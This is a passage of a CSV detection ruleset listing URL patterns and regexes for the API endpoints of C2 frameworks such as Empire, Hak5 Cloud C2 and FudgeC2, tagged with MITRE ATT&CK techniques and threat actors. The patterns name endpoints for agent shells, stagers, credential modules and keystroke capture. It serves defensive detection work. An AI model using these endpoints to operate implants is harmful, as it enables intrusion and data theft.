Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","5343" 
"*/api/agents/*/kill?token=*",".{0,1000}\/api\/agents\/.{0,1000}\/kill\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","5344" "*/api/agents/all/kill?token=*",".{0,1000}\/api\/agents\/all\/kill\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - 
T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","5345" "*/api/agents/all/shell?token=*",".{0,1000}\/api\/agents\/all\/shell\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - 
T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","5346" "*/api/agents/CXPLDTZCKFNT3SLT/shell?*",".{0,1000}\/api\/agents\/CXPLDTZCKFNT3SLT\/shell\?.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK 
SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","5347" "*/api/agents/stale?token=*",".{0,1000}\/api\/agents\/stale\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","5348" "*/api/agents/XMY2H2ZPFWNPGEAP?token=*",".{0,1000}\/api\/agents\/XMY2H2ZPFWNPGEAP\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - 
T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","5349" "*/api/listeners/all?token=*",".{0,1000}\/api\/listeners\/all\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - 
T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","5351" "*/api/modules/collection/*?token=*",".{0,1000}\/api\/modules\/collection\/.{0,1000}\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - 
Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","5352" "*/api/modules/credentials*?token=*",".{0,1000}\/api\/modules\/credentials.{0,1000}\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","5353" "*/api/reporting/agent/initial?token=*",".{0,1000}\/api\/reporting\/agent\/initial\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary 
emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","5354" "*/api/reporting/msg/*?token=*",".{0,1000}\/api\/reporting\/msg\/.{0,1000}\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - 
T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","5355" "*/api/reporting/type/checkin?token=*",".{0,1000}\/api\/reporting\/type\/checkin\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - 
TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","5356" "*/api/sites/1/devices/1/crocconfig*",".{0,1000}\/api\/sites\/1\/devices\/1\/crocconfig.{0,1000}","offensive_tool_keyword","hak5 cloudc2","Cloud C2 makes it easy for pentesters and security teams to deploy and manage Hak5 gear from the cloud","T1021 - T1102 - T1213","TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2?","1","1","N/A","N/A","10","9","N/A","N/A","N/A","N/A","5357" "*/api/sites/1/devices/1/deviceloot*",".{0,1000}\/api\/sites\/1\/devices\/1\/deviceloot.{0,1000}","offensive_tool_keyword","hak5 cloudc2","Cloud C2 makes it easy for pentesters and security teams to deploy and manage Hak5 gear from the cloud","T1021 - T1102 - T1213","TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2?","1","1","N/A","N/A","10","9","N/A","N/A","N/A","N/A","5358" "*/api/sites/1/devices/1/keystrokes/*",".{0,1000}\/api\/sites\/1\/devices\/1\/keystrokes\/.{0,1000}","offensive_tool_keyword","hak5 cloudc2","Cloud C2 makes it easy for pentesters and security teams to deploy and manage Hak5 gear from the cloud","T1021 - T1102 - T1213","TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2?","1","1","N/A","N/A","10","9","N/A","N/A","N/A","N/A","5359" "*/api/sites/1/devices/1/matchpayloads*",".{0,1000}\/api\/sites\/1\/devices\/1\/matchpayloads.{0,1000}","offensive_tool_keyword","hak5 cloudc2","Cloud C2 makes it easy for pentesters and security teams to deploy and manage Hak5 gear from the cloud","T1021 - T1102 
- T1213","TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2?","1","1","N/A","N/A","10","9","N/A","N/A","N/A","N/A","5360" "*/api/stagers/dll?token=*",".{0,1000}\/api\/stagers\/dll\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","5361" "*/api/stagers?token=*",".{0,1000}\/api\/stagers\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - 
T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","5362" "*/api/users/1/disable?token=*",".{0,1000}\/api\/users\/1\/disable\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - 
T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","5363" "*/api/v1/campaign/*/implants/*",".{0,1000}\/api\/v1\/campaign\/.{0,1000}\/implants\/.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","5364" "*/api/v1/implants/*/execute*",".{0,1000}\/api\/v1\/implants\/.{0,1000}\/execute.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","5366" "*/api/v1/implants/*/responses*",".{0,1000}\/api\/v1\/implants\/.{0,1000}\/responses.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","5367" "*/api/v2/starkiller*",".{0,1000}\/api\/v2\/starkiller.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 